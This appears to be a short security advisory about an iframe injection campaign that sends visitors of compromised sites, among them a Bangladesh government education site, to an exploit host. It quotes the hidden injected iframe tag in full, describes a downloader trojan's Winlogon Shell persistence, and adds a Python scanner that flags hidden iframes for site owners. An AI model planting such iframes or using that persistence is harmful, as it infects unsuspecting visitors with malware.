TheDeadPit.com Tortures Web Surfers

Over the past several weeks, a multitude of sites have been injected with malicious iframes that point to exploit code (which leads to downloader trojans) located on the attacker-owned ‘thedeadpit.com’. The form is always the same:

<iframe src="http://thedeadpit.com/?click=RANDOM" width=1 height=1 style="visibility:hidden;position:absolute">

where RANDOM is a numeric identifier that differs with each compromised site.
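For site owners auditing their own pages, here is an added example (not code from the original post) that flags iframes a visitor cannot see, the trait shared by the injected form quoted above, and reports the host and click identifier. The sample HTML, the click value 123456 and maps.example.org are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse, parse_qs

# Constructed sample page: one injected frame in the form shown above
# (backslash-escaped quotes included) and one ordinary visible embed.
SAMPLE = (
    '<html><body><p>School notices</p>'
    '<iframe src=\\"http://thedeadpit.com/?click=123456\\" width=1 height=1 '
    'style=\\"visibility:hidden;position:absolute\\"></iframe>'
    '<iframe src="https://maps.example.org/embed" width="600" height="400"></iframe>'
    '</body></html>'
)

HIDDEN_STYLE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)


class IframeAudit(HTMLParser):
    """Collect iframes that are invisible to the visitor."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "").strip() for k, v in attrs}
        reasons = []
        if HIDDEN_STYLE.search(a.get("style", "")):
            reasons.append("hidden-style")
        if all(a.get(d, "").rstrip("px") in ("0", "1") for d in ("width", "height")):
            reasons.append("tiny-frame")
        if reasons:
            url = urlparse(a.get("src", ""))
            click = parse_qs(url.query).get("click", [None])[0]
            self.findings.append({"host": url.hostname, "click": click, "reasons": reasons})


def scan(html):
    # Undo backslash-escaped quotes so the parser sees normal attributes.
    audit = IframeAudit()
    audit.feed(html.replace('\\"', '"'))
    audit.close()
    return audit.findings


if __name__ == "__main__":
    print(scan(SAMPLE))
```

Any finding whose host is not one the site owner embedded deliberately is worth tracing back to the template, database row or file that emitted it.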

The most recently discovered victim of thedeadpit.com iframe injection is the website of the Bangladesh Directorate of Primary Education, http://www.dpe.gov.bd. The Nigerian Tribune (www.tribune.com.ng) is also among those sites compromised in thedeadpit.com injection attacks.

The attack site delivers the malware intermittently, remaining dormant in between attacks. The trojan downloader delivered via the attacks appends its own path to the Winlogon Shell value:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\
Value: Shell = Explorer.exe <path to downloader>

By default, the value should read simply “Shell = Explorer.exe” with no additional file specified.

As its name suggests, a downloader trojan downloads additional malware to the infected computer. Most of today’s malware consists of remotely configurable data theft trojans. Heartland Payment Systems is the poster child for what today’s malware is capable of doing.

Alexbtp – Anderson_neo – Compiled from the internet
